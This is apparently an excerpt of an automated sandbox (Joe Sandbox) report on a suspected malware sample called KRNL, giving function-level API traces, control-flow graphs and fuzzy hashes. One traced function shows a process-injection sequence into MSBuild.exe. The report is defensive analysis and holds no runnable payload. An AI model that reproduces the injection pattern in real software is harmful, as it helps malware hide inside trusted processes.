                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                          • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                          • Instruction ID: 2336894a2a58aeb70f7ee618858027374725b59aab56cdd80a92ec8f7714991c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DB1F67664168AAFDB60CF6CCC80BDA73A5FF88714F158124EA08AB341D774FA51CB94
                                                                                                                                                                                                                                                          Function 006E1FB0 Relevance: 9.2, APIs: 6, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006E1240: _strlen.LIBCMT ref: 006E12BA
                                                                                                                                                                                                                                                          • CreateFileA.KERNELBASE ref: 006E2036
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 006E2046
                                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 006E206B
                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 006E207A
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 006E20CD
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 006E21FD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2911764282-0
                                                                                                                                                                                                                                                          • Opcode ID: 0ff04b945d2aac2ded0fb6e3497b7ca115f2b57ed97f4ff04de89150a15007e8
                                                                                                                                                                                                                                                          • Instruction ID: 7d82d5c2f4889cd71774557edc6e1056f3f457f206df0b3871306cfa55cc606e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ff04b945d2aac2ded0fb6e3497b7ca115f2b57ed97f4ff04de89150a15007e8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A171D2B2C013498FCB10DFA5DC44BEEBBB6BF49310F144628E914A7391E735AA45CBA5
                                                                                                                                                                                                                                                          Function 006E1000 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: pp
                                                                                                                                                                                                                                                          • API String ID: 0-2122341976
                                                                                                                                                                                                                                                          • Opcode ID: 551a11f1dc6cd88446fe5e4ec02312f469da16a9ce8c18e247cd909af1010734
                                                                                                                                                                                                                                                          • Instruction ID: dbb931ff9730d124bf46bebb33cd955cd264efb5b39007e379f905b42b98fc67
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 551a11f1dc6cd88446fe5e4ec02312f469da16a9ce8c18e247cd909af1010734
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4212B326102A50B879D9F396D6207BFB4BDBC75A0705562EDD129F3D1E930DE5082E8
                                                                                                                                                                                                                                                          Function 006E24B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleWindow.KERNELBASE ref: 006E24DD
                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 006E24E6
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006E2524
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2567
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2578
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2589
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E259A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3956949563-0
                                                                                                                                                                                                                                                          • Opcode ID: ccc2ea49c2a4c11781d26cbfda8cf62b9c8cabf05b63d102133f5225dbd906e3
                                                                                                                                                                                                                                                          • Instruction ID: fa8da950fbd48eda3c8cdc4c0d6502c1009abf29ead60990ac50d5af12390bcb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccc2ea49c2a4c11781d26cbfda8cf62b9c8cabf05b63d102133f5225dbd906e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9821A5F2D413959BDF50AF959D07BDE7BBAAF04710F080128F60476281E7B6A504C6A6
                                                                                                                                                                                                                                                          Function 006FCF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 51 6fcf0b-6fcf17 52 6fcfa9-6fcfac 51->52 53 6fcf1c-6fcf2d 52->53 54 6fcfb2 52->54 56 6fcf2f-6fcf32 53->56 57 6fcf3a-6fcf53 LoadLibraryExW 53->57 55 6fcfb4-6fcfb8 54->55 58 6fcf38 56->58 59 6fcfd2-6fcfd4 56->59 60 6fcfb9-6fcfc9 57->60 61 6fcf55-6fcf5e GetLastError 57->61 63 6fcfa6 58->63 59->55 60->59 62 6fcfcb-6fcfcc FreeLibrary 60->62 64 6fcf97-6fcfa4 61->64 65 6fcf60-6fcf72 call 700554 61->65 62->59 63->52 64->63 65->64 68 6fcf74-6fcf86 call 700554 65->68 68->64 71 6fcf88-6fcf95 LoadLibraryExW 68->71 71->60 71->64
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,AB1687B8,?,006FD01A,?,?,00000000), ref: 006FCFCC
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                          • Opcode ID: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
                                                                                                                                                                                                                                                          • Instruction ID: 794264b3dd513a880de7a660db47844131e8426facfd5debb747b33aefa0c95a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721F631A02219ABCB218B68ED41AEAB75B9F457B0F254111FA59A73D0D774ED00CAD0
                                                                                                                                                                                                                                                          Function 006E1750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 127 6e1750-6e17eb call 6f9c30 130 6e17ed-6e1803 127->130 131 6e1806-6e180b 127->131 130->131 132 6e180d-6e1816 131->132 133 6e181b-6e1821 131->133 135 6e1b69-6e1b8c 132->135 136 6e1823-6e1825 133->136 137 6e1851-6e1855 133->137 139 6e1b8e-6e1b95 call 6ed748 135->139 140 6e1be4-6e1c48 call 6e2f00 call 6e32c0 call 6f060c 135->140 136->137 141 6e1827-6e1849 call 6e2c50 136->141 138 6e1858-6e1898 call 6e4460 137->138 164 6e18ca-6e18e0 138->164 165 6e189a-6e18b4 138->165 152 6e1b9f-6e1bad 139->152 153 6e1b97-6e1b9a call 6e38e0 139->153 140->135 141->135 150 6e184f 141->150 150->138 157 6e1baf-6e1bce 152->157 158 6e1bd1-6e1be3 152->158 153->152 157->158 167 6e19b9 164->167 168 6e18e6-6e18f5 164->168 165->164 179 6e18b6-6e18c6 165->179 169 6e19bb-6e19c1 167->169 168->169 170 6e18fb 168->170 172 6e19ff-6e1a03 169->172 173 6e1900-6e1914 170->173 176 6e1a09-6e1a11 172->176 177 6e1a92-6e1a96 172->177 174 6e1916-6e191d 173->174 175 6e1940-6e1965 173->175 174->175 182 6e191f-6e192f 174->182 185 6e1968-6e1972 175->185 176->177 183 6e1a13-6e1a59 176->183 180 6e1a9c-6e1aa6 177->180 181 6e1b54-6e1b61 177->181 179->164 180->181 184 6e1aac 180->184 181->135 182->185 202 6e1a5b-6e1a62 183->202 203 6e1a68-6e1a89 call 6edef0 183->203 190 6e1ab0-6e1ac4 184->190 187 6e19aa-6e19b2 185->187 188 6e1974-6e1992 185->188 193 6e19b5-6e19b7 187->193 188->173 192 6e1998-6e19a8 188->192 194 6e1ac6-6e1acd 190->194 195 6e1af0-6e1b1c 190->195 192->193 193->169 194->195 197 6e1acf-6e1ae3 194->197 199 6e1b1e-6e1b47 195->199 206 6e1b4f 195->206 197->199 200 6e1ae5 197->200 199->190 205 6e1b4d 199->205 200->206 202->203 204 6e19d0-6e19dd 202->204 210 6e1a8b-6e1a8d 203->210 209 6e19e0-6e19fc 204->209 205->181 206->181 209->172 210->209
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                          • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                                          • Opcode ID: 99cbaa5e053cdb58593a0a7daa164c7394eb774f9a877c9c3ace476a37f27fc7
                                                                                                                                                                                                                                                          • Instruction ID: 7310d915460194a38f4f7413e5305a81b8d8e06c819722eb617de05489a6494d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99cbaa5e053cdb58593a0a7daa164c7394eb774f9a877c9c3ace476a37f27fc7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F15D75A012588FCB14CF69C494BADB7F2FF89320F198269E815AF391D734AD41CB90
                                                                                                                                                                                                                                                          Function 006F5349 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 212 6f5349-6f5354 213 6f536a-6f537d call 6f53da 212->213 214 6f5356-6f5369 call 6f76e4 call 6f7dcf 212->214 220 6f537f-6f539c CreateThread 213->220 221 6f53ab 213->221 223 6f539e-6f53aa GetLastError call 6f770a 220->223 224 6f53ba-6f53bf 220->224 225 6f53ad-6f53b9 call 6f542a 221->225 223->221 228 6f53c6-6f53ca 224->228 229 6f53c1-6f53c4 224->229 228->225 229->228
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 006F5392
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,006E2513,00000000,00000000), ref: 006F539E
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 006F53A5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744730728-0
                                                                                                                                                                                                                                                          • Opcode ID: 7df5d19426a9e366a0978f194efc9b55882fcec4d60dfb664c7a0b0a9bba59a8
                                                                                                                                                                                                                                                          • Instruction ID: 266b5e9d29d7abbf13614b305caed00c5436bd552bd8dc0fd4288ec541b582db
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7df5d19426a9e366a0978f194efc9b55882fcec4d60dfb664c7a0b0a9bba59a8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32012D7250561DABDF159FA8DC05AFE3BA6EF00391F108058FB0296190EBB1DD50DAA4
                                                                                                                                                                                                                                                          Function 006F54EE Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 232 6f54ee-6f54fb call 6fc2bb 235 6f54fd-6f5505 232->235 236 6f553b-6f553e ExitThread 232->236 235->236 237 6f5507-6f550b 235->237 238 6f550d call 6fce1b 237->238 239 6f5512-6f5518 237->239 238->239 241 6f551a-6f551c 239->241 242 6f5525-6f552b 239->242 241->242 243 6f551e-6f551f CloseHandle 241->243 242->236 244 6f552d-6f552f 242->244 243->242 244->236 245 6f5531-6f5535 FreeLibraryAndExitThread 244->245 245->236
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC2BB: GetLastError.KERNEL32(00000000,?,006F76E9,006FD306,?,?,006FC1B7,00000001,00000364,?,00000005,000000FF,?,006F5495,00718E38,0000000C), ref: 006FC2BF
                                                                                                                                                                                                                                                            • Part of subcall function 006FC2BB: SetLastError.KERNEL32(00000000), ref: 006FC361
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,006F53D9,?,?,006F54CE,00000000), ref: 006F551F
                                                                                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,006F53D9,?,?,006F54CE,00000000), ref: 006F5535
                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 006F553E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1991824761-0
                                                                                                                                                                                                                                                          • Opcode ID: fbe41fb29f43578eab2063c0e5997e91200ed80e641f8037c4c3579d69169ea0
                                                                                                                                                                                                                                                          • Instruction ID: e8790d09b6395eedf7fb669f2ba9f2708658f38ef1dc0299984371f172234eb0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe41fb29f43578eab2063c0e5997e91200ed80e641f8037c4c3579d69169ea0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF0F471500A0967CB255F7998496BA3A9BAF00370B188614FBAAC72E1DB24ED52C794
                                                                                                                                                                                                                                                          Function 006F565F Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000002,?,006F5721,006F8396,006F8396,?,00000002,AB1687B8,006F8396,00000002), ref: 006F5670
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,006F5721,006F8396,006F8396,?,00000002,AB1687B8,006F8396,00000002), ref: 006F5677
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 006F5689
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                          • Opcode ID: 635c2a51b33c77d26b498cd2f640dff92d93e556bce2d7773a4f61819b751cd0
                                                                                                                                                                                                                                                          • Instruction ID: c3d4433d5b7c37ead2e87c436a30f4111f662253bbf25d4fa75f2f20a00ba2da
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 635c2a51b33c77d26b498cd2f640dff92d93e556bce2d7773a4f61819b751cd0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AD09E31100508BBCF412F65EC0D8E93F2BEF40381744C014BB56891B2DF359D51DA98
                                                                                                                                                                                                                                                          Function 00703BF4 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
